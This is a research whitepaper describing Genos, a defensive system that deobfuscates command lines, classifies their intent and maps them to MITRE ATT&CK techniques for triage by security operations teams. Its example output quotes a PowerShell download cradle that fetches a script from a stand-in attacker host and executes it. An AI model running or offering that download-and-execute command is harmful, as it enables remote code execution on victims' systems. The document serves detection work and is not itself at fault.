Genos v1.2 · IEEE AIIoT 2026 · Research Whitepaper
Security tools collect raw telemetry, but analysts still need to interpret intent. Genos introduces command intelligence: a hybrid system that deobfuscates command-line activity, classifies behavioral intent, and maps malicious actions to MITRE ATT&CK techniques in milliseconds. The system achieves Tier 1 AUC 0.9999 with F1 99.96% on binary threat classification, and 95.53% Top-1 / 97.94% Top-3 accuracy on 108-class MITRE technique attribution — operating at sub-100 ms latency without requiring cloud inference or external API calls. Genos is the research artifact underlying two accepted IEEE AIIoT 2026 papers and is designed as a deployable, analyst-facing intelligence layer for SOC triage, SIEM enrichment, and automated threat attribution.
Command-line activity is one of the richest behavioral signals available to a defender. Every living-off-the-land attack, every credential theft, every lateral movement attempt leaves a trace in process telemetry — yet most security platforms treat command-line data as opaque text, passing it through signature rules or handing it to an analyst with no structured interpretation.
The core difficulty is threefold. First, malicious commands are routinely obfuscated: Base64-encoded payloads, PowerShell character-code constructions, string concatenation, and nested encoding layers are standard adversary practice. A raw string match fails against these techniques by design. Second, even a plaintext command is deeply context-dependent — net user /domain is reconnaissance in one environment and routine IT administration in another. Third, the volume of command-line events in any moderately active environment is large enough that manual triage at scale is not feasible.
Existing approaches — YARA rules, keyword blocklists, traditional SIEM correlation — are brittle, require continuous manual maintenance, and produce high false-positive rates against obfuscated or novel payloads. Large language model-based approaches offer flexibility but introduce latency, cost, and non-determinism that are incompatible with real-time SOC workflows.
Genos is built around the concept of command intelligence: a structured, machine-readable behavioral interpretation of a raw command string. Rather than asking "does this match a known bad signature?", Genos asks three questions in sequence:
This three-question structure produces output that is immediately actionable: an analyst or automated system can triage, escalate, or suppress an alert based on a verdict and a named technique, rather than a raw alert count or a signature ID.
Command intelligence is designed to be a decision layer — sitting between raw telemetry collection (EDR, SIEM, UEBA) and analyst workflow — rather than a replacement for existing detection infrastructure. It enriches existing alerts with behavioral context and ATT&CK-aligned attribution that current tooling does not provide.
Genos processes every command through a sequential four-stage pipeline. Each stage produces structured output that feeds the next.
The two-tier inference design is deliberate. Tier 1 is a neural model: accurate and generalizable, but slower to train and update. Tier 2 is a classical ML pipeline: fast to retrain on new ATT&CK technique data, interpretable via feature weights, and independent of the neural model's internal representations. Keeping them separate means either tier can be improved or retrained without affecting the other.
The entire pipeline is served as a REST API via Gunicorn and Flask, bound to localhost and designed to sit behind a reverse proxy. No external inference calls are made at runtime — all computation is local.
A critical requirement for any command intelligence system is the ability to handle adversarial encoding. In practice, a significant fraction of malicious commands in the wild are obfuscated — specifically to defeat signature-based detection. Genos addresses this with an entropy-aware, iterative deobfuscation pipeline that runs before any classification.
Obfuscation is detected using a combination of Shannon entropy thresholding (commands exceeding 5.2 bits/character are flagged) and pattern matching against six structural indicators: PowerShell character-code constructions, inline Base64 references, string reversal wrappers, concatenation fragments, long obfuscated variable names, and hex byte escapes.
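The entropy check described above can be sketched in a few lines of Python. This is a minimal illustration, not the Genos implementation: the 5.2 bits/character threshold comes from the text, while the two regular expressions are hypothetical stand-ins for two of the six structural indicators. Treating entropy and pattern matches as alternative triggers is also an assumption.

```python
import math
import re
from collections import Counter

ENTROPY_THRESHOLD = 5.2  # bits per character, as stated in the text

# Hypothetical stand-ins for two of the six structural indicators;
# the actual patterns used by Genos are not given in this document.
INDICATOR_PATTERNS = [
    re.compile(r"\[char\]\s*\d+", re.IGNORECASE),         # char-code construction
    re.compile(r"FromBase64String\s*\(", re.IGNORECASE),  # inline Base64 reference
]


def shannon_entropy(text: str) -> float:
    """Shannon entropy of the character distribution, in bits per character."""
    if not text:
        return 0.0
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_obfuscated(command: str) -> bool:
    """Flag a command when entropy exceeds the threshold or any indicator matches.

    Combining the two signals with a logical OR is an assumption.
    """
    if shannon_entropy(command) > ENTROPY_THRESHOLD:
        return True
    return any(p.search(command) for p in INDICATOR_PATTERNS)
```

Short plaintext commands have too few distinct characters to approach the threshold, so for them the structural patterns are the only signal that can fire.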
When obfuscation is detected, the engine runs up to five decoding passes in sequence, applying: universal Base64 decoding, embedded FromBase64String() extraction, PowerShell invocation wrapper stripping, character-code resolution ([char]65, range-expansion patterns), and string concatenation collapsing. An optional AST-level simplification step is applied if the pyminusone library is installed. Each pass operates on the output of the previous, and the loop exits early when a pass produces no further entropy reduction (delta < 0.01 bits).
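The bounded loop with an entropy-delta early exit might look like the sketch below. It assumes only two of the decoding steps (embedded FromBase64String() extraction and [char]N resolution), and the helper names are hypothetical. Keeping the output of the final pass even when it triggers the early exit is a design assumption, since the text does not say which behavior Genos uses.

```python
import base64
import math
import re
from collections import Counter

MAX_PASSES = 5            # pass bound stated in the text
MIN_ENTROPY_DELTA = 0.01  # bits; early-exit threshold stated in the text

_B64_CALL = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE
)
_CHAR_CODE = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)


def shannon_entropy(text: str) -> float:
    """Shannon entropy in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in Counter(text).values())


def _decode_embedded_base64(text: str) -> str:
    """Replace FromBase64String('...') calls with their decoded UTF-8 text."""
    def repl(match: re.Match) -> str:
        try:
            return base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            return match.group(0)
    return _B64_CALL.sub(repl, text)


def _resolve_char_codes(text: str) -> str:
    """Replace [char]N constructions with the character they denote."""
    def repl(match: re.Match) -> str:
        code = int(match.group(1))
        return chr(code) if code < 0x110000 else match.group(0)
    return _CHAR_CODE.sub(repl, text)


def deobfuscate(command: str) -> tuple:
    """Run up to MAX_PASSES decoding passes; return (text, passes_run)."""
    current = command
    entropy = shannon_entropy(current)
    passes = 0
    for _ in range(MAX_PASSES):
        candidate = _resolve_char_codes(_decode_embedded_base64(current))
        new_entropy = shannon_entropy(candidate)
        delta = entropy - new_entropy
        current, entropy = candidate, new_entropy
        passes += 1
        if delta < MIN_ENTROPY_DELTA:  # no meaningful entropy reduction: stop
            break
    return current, passes
```

The hard pass limit bounds the work done on deeply nested input, while the early exit avoids spending passes on commands that are already fully decoded.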
For Tier 2 attribution, the engine uses a structured "Variant A" text representation produced by the parser module, which extracts residual tokens — flags, arguments, paths, executables — separately from the normalized command body. This representation exposes structural features that improve technique attribution beyond raw text matching.
For obfuscated commands, Tier 2 runs twice — once on the original text, once on the decoded payload — and the results are merged by taking the highest confidence score per technique code, capped at five techniques in the final response.
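The merge step can be illustrated as follows. The function name and the list-of-dicts input shape are assumptions modeled on the MITRE_codes field of the response schema. The max-per-code rule and the cap of five come from the text.

```python
from typing import Dict, List

MAX_TECHNIQUES = 5  # cap stated in the text


def merge_attributions(original: List[dict], decoded: List[dict]) -> List[dict]:
    """Merge two Tier 2 result lists, keeping the highest confidence per code."""
    best: Dict[str, float] = {}
    for entry in [*original, *decoded]:
        code, confidence = entry["code"], entry["confidence"]
        if confidence > best.get(code, float("-inf")):
            best[code] = confidence
    # Rank by confidence, highest first, and keep at most MAX_TECHNIQUES.
    ranked = sorted(best.items(), key=lambda item: item[1], reverse=True)
    return [{"code": c, "confidence": s} for c, s in ranked[:MAX_TECHNIQUES]]
```

Taking the maximum rather than an average means that a technique visible only in the decoded payload is not diluted by a low score on the obfuscated text.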
The Gatekeeper is a fine-tuned CodeBERT model trained for three-class classification: Benign, Malicious, and Context-Dependent. CodeBERT was selected over general-purpose language models because it was pre-trained on both natural language and code corpora, giving it a structural understanding of command syntax, flag conventions, and common shell patterns that generic text encoders lack.
The classification head is a two-layer MLP with GELU activation and dropout regularization, operating on the CLS token representation (768 dimensions). Inference runs under mixed-precision autocast — float16 on CUDA, bfloat16 on CPU — making it feasible to run on a single consumer GPU or a standard CPU server without significant latency penalty.
The Gatekeeper's raw neural output is a probability distribution over three classes. This distribution is then passed to a rule-based routing layer before the final verdict is issued, described in Section 6.
The Specialist is a scikit-learn pipeline combining TF-IDF character n-gram features with a Random Forest classifier, trained to attribute commands to one of 108 MITRE ATT&CK techniques. It runs on every request regardless of the Tier 1 verdict — even commands classified as Benign receive a technique attribution, which can surface legitimate administrative commands that map to adversary-relevant behaviors (e.g., net user /domain mapping to T1087 — Account Discovery).
The choice of TF-IDF + Random Forest for Tier 2 is deliberate. Character n-gram features capture subword patterns — flag combinations, executable names, argument structure — that are highly informative for technique attribution and that persist across obfuscation variants. Random Forest provides calibrated per-class probability estimates and can be retrained on new technique data in minutes rather than hours, making it practical to keep the technique map current as the ATT&CK framework evolves.
Tier 2 inference takes approximately 90 ms and runs synchronously with Tier 1, adding negligible end-to-end latency relative to the neural forward pass.
A key architectural decision in Genos is the explicit separation of neural inference and deterministic rule evaluation. The Gatekeeper neural model produces a raw probability distribution, but this distribution is then processed by a rule-based routing layer before the final verdict is issued.
The routing layer operates in four modes:
chmod 777 or crontab -l, are downgraded from Malicious to Suspicious, preventing over-escalation on common administrative operations.
This hybrid architecture is intentional. Pure neural approaches achieve high accuracy on in-distribution data but can produce unexpected outputs on novel obfuscation patterns or adversarially crafted inputs. Pure rule systems are brittle and require constant manual maintenance. The combination, in which the neural model provides the base distribution and deterministic rules provide hard constraints and behavioral guardrails, produces a system that is both accurate and operationally auditable.
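As an illustration of how a deterministic guardrail can sit on top of the neural verdict, the sketch below implements only the safe-list downgrade mentioned above. The patterns are hypothetical: the text names chmod 777 and crontab -l as examples but does not give the actual safe-list or its matching rules.

```python
import re

# Hypothetical safe-list built from the two commands named in the text.
SAFE_LIST = [
    re.compile(r"^\s*chmod\s+777\b"),
    re.compile(r"^\s*crontab\s+-l\s*$"),
]


def apply_safe_list(label: str, command: str) -> str:
    """Downgrade a Malicious verdict to Suspicious for safe-listed commands."""
    if label == "Malicious" and any(p.search(command) for p in SAFE_LIST):
        return "Suspicious"
    return label
```

Because the rule is a plain function of the label and the command text, its effect on any given verdict can be audited without inspecting the model.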
Every Genos response is a structured JSON object. The schema is consistent across all verdict types, with additional fields populated for obfuscated inputs and context-dependent classifications.
Example (malicious command, encoded PowerShell download cradle):
{
  "label": "Malicious",
  "label_confidence": 99.81,
  "deobfuscated_cmd": "invoke-webrequest http://attacker.com/malware.sh | iex",
  "MITRE_codes": [
    { "code": "T1059.001", "confidence": 97.43 },
    { "code": "T1071.001", "confidence": 1.22 },
    { "code": "T1105", "confidence": 0.81 },
    { "code": "T1027", "confidence": 0.48 },
    { "code": "T1086", "confidence": 0.06 }
  ],
  "decoded_payload": "Invoke-WebRequest http://attacker.com/malware.sh | IEX"
}
Example (benign administrative command):
{
  "label": "Benign",
  "label_confidence": 99.99,
  "deobfuscated_cmd": null,
  "MITRE_codes": []
}
Example (context-dependent command requiring analyst review):
{
  "label": "Context_Dependent",
  "action": "requires_context",
  "label_confidence": 71.4,
  "MITRE_codes": [
    { "code": "T1087", "confidence": 88.21 }
  ]
}
| Field | Type | Description |
|---|---|---|
| label | string | Verdict: Benign, Suspicious, Malicious, or Context_Dependent |
| label_confidence | float | Calibrated confidence as a percentage (0–100) |
| MITRE_codes | array | Top-5 technique attributions with per-code confidence; present on all responses |
| deobfuscated_cmd | string or null | Decoded command text; null if no obfuscation was detected |
| decoded_payload | string | Populated for obfuscated inputs with a recoverable payload |
| action | string | Set to "requires_context" for Context_Dependent verdicts |
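
A consumer of this schema could parse responses into typed objects along the following lines. The class and function names are hypothetical; only the JSON field names are taken from the table above. Optional fields default to None when absent.

```python
import json
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Technique:
    code: str
    confidence: float


@dataclass
class ScanResult:
    label: str
    label_confidence: float
    mitre_codes: List[Technique] = field(default_factory=list)
    deobfuscated_cmd: Optional[str] = None
    decoded_payload: Optional[str] = None
    action: Optional[str] = None


def parse_scan_result(raw: str) -> ScanResult:
    """Parse a Genos JSON response string into a ScanResult."""
    data = json.loads(raw)
    return ScanResult(
        label=data["label"],
        label_confidence=float(data["label_confidence"]),
        mitre_codes=[
            Technique(t["code"], float(t["confidence"]))
            for t in data.get("MITRE_codes", [])
        ],
        deobfuscated_cmd=data.get("deobfuscated_cmd"),
        decoded_payload=data.get("decoded_payload"),
        action=data.get("action"),
    )
```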
Genos was evaluated against held-out test splits and a deployment-aligned IEEE benchmark comparing the full neural pipeline against a TF-IDF + Random Forest baseline across multiple traffic compositions and obfuscation scenarios.
The IEEE benchmark evaluated the pipeline at multiple benign-to-malicious traffic ratios to simulate realistic SOC telemetry distributions. Results were stable across ratios, with no significant degradation in precision at high benign traffic volumes — a critical property for operational deployment where false-positive rates directly affect analyst workload.
The stress test (500 concurrent requests, 50% malicious, 20 workers) confirmed consistent throughput at the target latency envelope. Full benchmark artefacts — ROC curves, per-class F1 breakdowns, and latency distributions — are available in the repository's logs/ directory.
Genos was also benchmarked against LLM-based classification approaches for command intent labeling. The neural + rule hybrid pipeline matched or exceeded LLM accuracy on the evaluated corpus while operating at a fraction of the latency and without per-query API cost — a meaningful operational advantage for high-volume telemetry environments.
Genos can be integrated into a SOC workflow as a first-pass triage layer. Rather than routing every command-line alert to an analyst, a Genos verdict of Benign with high confidence can suppress the alert automatically. Malicious verdicts with ATT&CK technique codes are escalated directly to the relevant analyst queue with pre-populated context — reducing the time between detection and investigation from minutes to seconds.
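A first-pass triage policy of this kind could be sketched as below. The 99.0 suppression threshold and the three action names are illustrative assumptions. The document does not specify what counts as "high confidence" or how non-malicious, non-benign verdicts are queued.

```python
BENIGN_SUPPRESS_THRESHOLD = 99.0  # hypothetical cut-off for "high confidence"


def triage(result: dict) -> str:
    """Map a Genos response to a triage action: suppress, escalate, or review."""
    label = result["label"]
    confidence = result["label_confidence"]
    if label == "Benign" and confidence >= BENIGN_SUPPRESS_THRESHOLD:
        return "suppress"
    if label == "Malicious":
        return "escalate"
    # Suspicious, Context_Dependent, and low-confidence Benign go to an analyst.
    return "review"
```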
Genos output can be written back to a SIEM as structured fields: verdict, confidence, MITRE technique IDs, and decoded payload. This transforms raw process creation logs into queryable behavioral data. Analysts can write SIEM rules against mitre_code:T1059 rather than maintaining fragile regex patterns against raw command text.
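One way to flatten a response into SIEM fields is sketched below. The genos_* field names are hypothetical; mitre_code follows the query example in the text. Adding the parent technique ID alongside each sub-technique is an assumption, made so that a query such as mitre_code:T1059 also matches T1059.001.

```python
def to_siem_fields(result: dict) -> dict:
    """Flatten a Genos response into fields suitable for a SIEM event."""
    codes = []
    for technique in result.get("MITRE_codes", []):
        code = technique["code"]
        codes.append(code)
        codes.append(code.split(".")[0])  # parent technique, e.g. T1059
    fields = {
        "genos_verdict": result["label"],
        "genos_confidence": result["label_confidence"],
        # dict.fromkeys removes duplicates while preserving order
        "mitre_code": list(dict.fromkeys(codes)),
    }
    payload = result.get("decoded_payload")
    if payload:
        fields["genos_decoded_payload"] = payload
    return fields
```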
For managed security providers handling telemetry from multiple clients, Genos provides a consistent, vendor-agnostic behavioral labeling layer. Because the pipeline runs locally and requires no external connectivity, it can be deployed in air-gapped or restricted environments where cloud inference is not permitted.
The Context-Dependent verdict class is specifically designed for integration with automated decision workflows. When Genos returns action: requires_context, a downstream orchestration system can query additional telemetry — parent process, user context, network connections — and re-submit the enriched command for a final classification decision without human intervention.
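The re-submission loop can be sketched with the scanner and the enrichment step passed in as callables. Both callables are assumptions: the document does not define how additional telemetry is encoded into the re-submitted command, so that detail is left entirely to the hypothetical enrich function.

```python
from typing import Callable


def resolve_context(
    command: str,
    scan: Callable[[str], dict],
    enrich: Callable[[str], str],
) -> dict:
    """Scan a command and re-submit it once if Genos asks for more context.

    scan   -- sends a command to Genos and returns the parsed response
    enrich -- hypothetical hook that returns the command augmented with
              extra telemetry (parent process, user, network connections)
    """
    result = scan(command)
    if result.get("action") != "requires_context":
        return result
    return scan(enrich(command))
```

Limiting the flow to a single re-submission keeps the orchestration bounded. If the second verdict is still context-dependent, it is returned as-is for analyst review.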
Genos exposes a minimal REST API served by Gunicorn on 127.0.0.1:6001 by default, designed to sit behind a reverse proxy. Two scan endpoints are available.
POST /scan — production endpoint, MongoDB API-key authentication:
curl -X POST https://your-deployment/scan \
  -H "Content-Type: application/json" \
  -d '{"api_key": "YOUR_KEY", "command": "net user /domain"}'
POST /scan/internal — no-database endpoint for CI, testing, and integration:
curl -X POST http://127.0.0.1:6001/scan/internal \
  -H "Content-Type: application/json" \
  -d '{"command": "powershell -enc SQBuAHYAbwBrAGUA..."}'
The command field accepts both plain text and Base64-encoded strings. The API attempts a full Base64 decode before passing to the engine, falling back to plain text transparently — which means SIEM and EDR integrations can forward raw process arguments without pre-processing.
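The decode-with-fallback behavior might be implemented roughly as follows. This is a sketch under assumptions: strict Base64 validation and UTF-8 decoding are choices made here, not details confirmed by the document, and the function name is hypothetical.

```python
import base64


def normalize_command(value: str) -> str:
    """Return the Base64-decoded command, or the input unchanged on failure."""
    try:
        decoded = base64.b64decode(value, validate=True)
        text = decoded.decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return value
    return text if text else value
```

Strict validation rejects any input containing spaces or other non-alphabet characters, so typical plaintext commands fall through untouched. A short plaintext token that happens to be valid Base64 and decodes to valid UTF-8 would still be misread, which is an inherent ambiguity of accepting both forms in one field.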
Integration with SIEM platforms can be achieved via Logstash or Elastic ingest pipelines calling the scan endpoint and writing the response fields back to the original event document. Python and Bash integration examples are included in the repository.
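For reference, a minimal standard-library client for the internal endpoint could look like this. It is not the integration example shipped in the repository. The helper names are hypothetical, and the optional INTERNAL_TEST_TOKEN is left out because the document does not say how the token is transmitted.

```python
import json
import urllib.request

DEFAULT_URL = "http://127.0.0.1:6001/scan/internal"  # default bind from the text


def build_scan_request(command: str, url: str = DEFAULT_URL) -> urllib.request.Request:
    """Build the POST request for a scan without sending it."""
    body = json.dumps({"command": command}).encode("utf-8")
    return urllib.request.Request(
        url,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def scan(command: str, url: str = DEFAULT_URL, timeout: float = 10.0) -> dict:
    """Send a command to Genos and return the parsed JSON response."""
    request = build_scan_request(command, url)
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return json.loads(response.read().decode("utf-8"))
```

Calling scan("net user /domain") against a running instance would return the response object described in the output schema.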
Genos is designed for single-server deployment with a reverse proxy. The Gunicorn worker is single-process to avoid multiplying GPU memory usage — a second worker would require a second copy of the CodeBERT model in VRAM. On a machine with a dedicated GPU and cached model weights, startup takes under 60 seconds; on CPU-only hardware, startup is longer but inference remains operationally viable at reduced throughput.
The system is production-hardened: model weights are loaded with weights_only=True to prevent arbitrary code execution via malicious checkpoints; the deobfuscation loop is bounded to five passes with an entropy-delta early-exit to prevent deobfuscation bombs; the internal scan endpoint is firewall-protected and optionally token-gated; and no real credentials or secrets are committed to the repository.
Genos is the primary research artifact from two papers accepted to the IEEE World AI IoT Congress (AIIoT 2026), Seattle, USA. Both papers are first-authored by Ahmed Khan.
A Two-Stage Transformer-Based Framework for Command-Line Classification and MITRE ATT&CK Technique Mapping
Presents the cascaded CodeBERT + TF-IDF/RF architecture, deobfuscation pipeline, and evaluation results across 141 technique classes. Reports Tier 1 AUC 0.9999 / F1 99.96% and Tier 2 95.53% Top-1 / 97.94% Top-3 accuracy.
Open-Source Next Gen Endpoint Detection & Response
Presents a kernel-driverless Ring 3 EDR research system using LoRA-fine-tuned RoBERTa for 4-class MITRE ATT&CK behavior detection, achieving 99.5% accuracy across a 1,200-case adversarial stress suite.
Both papers will be published through the IEEE AIIoT 2026 programme. PDFs, BibTeX, and supplementary materials will be linked here upon publication.
The current Genos pipeline classifies each command independently. The most significant planned extension is sequence-level reasoning: modeling chains of commands — execution followed by persistence followed by lateral movement — as a temporally ordered adversary behavior graph, enabling detection of multi-stage attacks that are individually ambiguous but collectively unambiguous.
Additional planned directions include: expanded ATT&CK coverage beyond the current 108-technique Specialist map; integration of structured shell AST features as complementary inputs alongside TF-IDF representations; investigation of structure-aware pre-training objectives that better capture the syntactic properties of command-line data; and evaluation on cross-platform telemetry (Linux, macOS) beyond the current Windows-heavy training distribution.
If you use Genos or build on this work, please cite the associated IEEE papers:
@inproceedings{khan2026genos,
  title     = {A Two-Stage Transformer-Based Framework for Command-Line
               Classification and MITRE ATT\&CK Technique Mapping},
  author    = {Khan, Ahmed},
  booktitle = {Proceedings of the IEEE World AI IoT Congress (AIIoT 2026)},
  year      = {2026},
  address   = {Seattle, USA}
}
@inproceedings{khan2026edr,
  title     = {Open-Source Next Gen Endpoint Detection \& Response},
  author    = {Khan, Ahmed},
  booktitle = {Proceedings of the IEEE World AI IoT Congress (AIIoT 2026)},
  year      = {2026},
  address   = {Seattle, USA}
}
Uses RobertaTokenizer from microsoft/codebert-base. Max length: 256 tokens (override with GENOS_MAX_TOKENS). Padding: max_length. Truncation enabled. Returns PyTorch tensors.
Inference under torch.no_grad() + torch.amp.autocast: float16 on CUDA, bfloat16 on CPU.
| Variable | Default | Purpose |
|---|---|---|
| MONGO_URI | — | MongoDB connection string; enables /scan |
| INTERNAL_TEST_TOKEN | — | Optional token for /scan/internal |
| GENOS_API_BIND | 127.0.0.1:6001 | Gunicorn bind address |
| GENOS_MAX_TOKENS | 256 | Tokeniser max sequence length |
| File | Purpose |
|---|---|
| models/gatekeeper.pt | Tier 1 CodeBERT weights (Git LFS) |
| models/specialist_tfidf_char_rf.pkl | Tier 2 active model (not in git, ~2.4 GB) |
| config/specialist_map.json | 108-class MITRE technique index |
| config/gatekeeper_meta.json | Threshold and training metadata |
GenosEngine is constructed once on process start — no hot-reload. Asset paths are resolved in order: absolute path → relative to os.getcwd() → relative to engine.py directory. A warmup pass runs before traffic is accepted; GET /health returns {"status":"ok"} once complete.
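The three-step asset lookup can be sketched as follows. The function name and the engine_dir parameter are hypothetical; in engine.py the directory would presumably be derived from the module's own location. Returning None when nothing is found is also an assumption.

```python
import os
from pathlib import Path
from typing import Optional


def resolve_asset(path: str, engine_dir: str) -> Optional[Path]:
    """Resolve an asset path: absolute, then cwd-relative, then engine-relative."""
    candidate = Path(path)
    if candidate.is_absolute():
        return candidate if candidate.exists() else None
    for base in (Path(os.getcwd()), Path(engine_dir)):
        resolved = base / candidate
        if resolved.exists():
            return resolved
    return None
```

Checking the working directory before the engine directory lets an operator override bundled assets by launching the service from a directory that contains replacements.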
| Setting | Value | Reason |
|---|---|---|
| workers | 1 | One model copy in GPU memory |
| worker_class | sync | An initialized CUDA context does not survive fork() |
| timeout | 300 s | Covers model load on startup |
| preload_app | unset | Prevents fork after CUDA init |
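
Expressed as a Gunicorn configuration file, the settings above might look like the following. This is a sketch of a gunicorn.conf.py, not the file shipped with Genos. Reading GENOS_API_BIND from the environment inside the config file is an assumption about how the variable is wired in.

```python
import os

# Bind address; falls back to the documented default.
bind = os.environ.get("GENOS_API_BIND", "127.0.0.1:6001")

# A single worker keeps exactly one copy of the model in GPU memory.
workers = 1

# Synchronous worker class, as listed in the table above.
worker_class = "sync"

# Generous timeout (seconds) so the model load on startup is not killed.
timeout = 300

# preload_app is intentionally left unset so the application, and with it
# CUDA, is initialized inside the worker rather than before the fork.
```

Such a file would typically be passed to Gunicorn with its -c option.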